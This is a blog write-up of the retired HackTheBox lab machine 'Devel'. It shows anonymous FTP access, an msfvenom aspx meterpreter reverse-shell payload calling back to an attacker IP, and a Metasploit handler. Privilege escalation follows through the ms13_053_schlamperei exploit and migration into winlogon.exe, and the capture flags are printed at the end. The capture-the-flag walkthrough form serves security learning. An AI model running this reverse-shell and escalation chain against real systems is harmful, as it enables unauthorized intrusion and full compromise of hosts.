Reece Russell

Devel

  • May 24, 2023

Devel is an easy difficulty retired machine on HackTheBox.

[RECON]

Let’s start with a simple Nmap scan as per usual.

$ nmap -A 10.10.10.5  
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-24 08:34 BST
Nmap scan report for 10.10.10.5
Host is up (0.022s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.41 seconds

The biggest thing that jumps out straight away is that anonymous FTP login is allowed. This allows you to access the FTP server with the username: ‘anonymous’ and anything as the password.

$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:reece): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.

[EXPLOITATION]

As you can see, we have complete access to the webserver. So the simplest way to exploit this is to use MSFvenom to create a reverse TCP payload and upload this onto the webserver using FTP.

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=4444 -f aspx > shell.aspx

ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
229 Entering Extended Passive Mode (|||49159|)
125 Data connection already open; Transfer starting.
100% |********************************|  2879       31.55 MiB/s    --:-- ETA
226 Transfer complete.
2879 bytes sent in 00:00 (87.41 KiB/s)

With the shell.aspx file uploaded onto the webserver, we can now use Metasploit to create a quick listener on port 4444 so that once we search for the address: 10.10.10.5/shell.aspx, we can get a shell.

$ msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run

Now we have a meterpreter session! However this is a very basic shell and does not have any user privileges.

[PRIVILEGE ESCALATION]

meterpreter > cd babis
[-] stdapi_fs_chdir: Operation failed: Access is denied.

Babis is a user and as you can see, we cannot access their area on the machine. So we need to escalate privileges and since we already have a meterpreter session with Metasploit, this is pretty simple. First we need to background the session, then we can use the local exploit suggester which looks for vulnerabilities in a specified session and checks what exploits would work.

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(multi/handler) > use 0
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 167 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

Since this is a Windows 7 machine… there are a lot of vulnerabilities. From here, there are probably a number of exploits that can escalate your privilege. I chose the ‘ms13_053_schlamperei’ exploit since I have used it in CTFs in the past and it is generally pretty simple. It basically just creates a system process called ‘winlogon.exe’ which has admin privileges. All that needs to be done from there is to migrate to that process number and boom, you have root.

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms13_053_schlamperei
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms13_053_schlamperei) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ms13_053_schlamperei) > run

[*] Started reverse TCP handler on 10.0.2.15:4444
[*] Launching notepad to host the exploit...
[+] Process 3376 launched.
[*] Reflectively injecting the exploit DLL into 3376...
[*] Injecting exploit into 3376...
[*] Found winlogon.exe with PID 428
[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell
[*] Exploit completed, but no session was created.

msf6 exploit(windows/local/ms13_053_schlamperei) > sessions 1
[*] Starting interaction with 1...

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User             Path
 ---   ----  ----               ----  -------  ----             ----
 0     0     [System Process]
 4     0     System
 232   4     smss.exe
 252   600   WmiPrvSE.exe
 304   472   dllhost.exe
 320   304   csrss.exe
 372   364   csrss.exe
 380   304   wininit.exe
 428   364   winlogon.exe       x86   1                         C:\Windows\system32\winlogon.exe
 472   380   services.exe
 488   380   lsass.exe
 496   380   lsm.exe
 600   472   svchost.exe
 676   472   svchost.exe
 752   428   LogonUI.exe
 760   472   svchost.exe
 808   472   svchost.exe
 852   472   svchost.exe
 952   472   svchost.exe
 1024  472   msdtc.exe
 1048  472   svchost.exe
 1152  320   conhost.exe        x86   0        IIS APPPOOL\Web  C:\Windows\system32\conhost.exe
 1184  472   spoolsv.exe
 1216  472   svchost.exe
 1308  472   svchost.exe
 1336  472   svchost.exe
 1396  472   svchost.exe
 1468  472   VGAuthService.exe
 1544  472   vmtoolsd.exe
 1600  472   svchost.exe
 1908  2776  cmd.exe            x86   0        IIS APPPOOL\Web  C:\Windows\system32\cmd.exe
 2468  600   WmiPrvSE.exe
 2712  2776  cmd.exe            x86   0        IIS APPPOOL\Web  C:\Windows\system32\cmd.exe
 2776  1600  w3wp.exe           x86   0        IIS APPPOOL\Web  c:\windows\system32\inetsrv\w3wp.exe
 3028  472   sppsvc.exe
 3072  472   svchost.exe
 3200  320   conhost.exe        x86   0        IIS APPPOOL\Web  C:\Windows\system32\conhost.exe
 3224  472   SearchIndexer.exe

meterpreter > migrate 428
[*] Migrating from 2776 to 428...
[*] Migration completed successfully.
meterpreter > shell
Process 2924 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

It worked flawlessly! With root access to the machine all you need to do now is look around for the flags :).

meterpreter > cat C://Users/babis/Desktop/user.txt
9daac9a7199b30b7b9ce8b09147d2fc0
meterpreter > cat C://Users/Administrator/Desktop/root.txt
6428968eabb10759b33844ae88668ad4
Search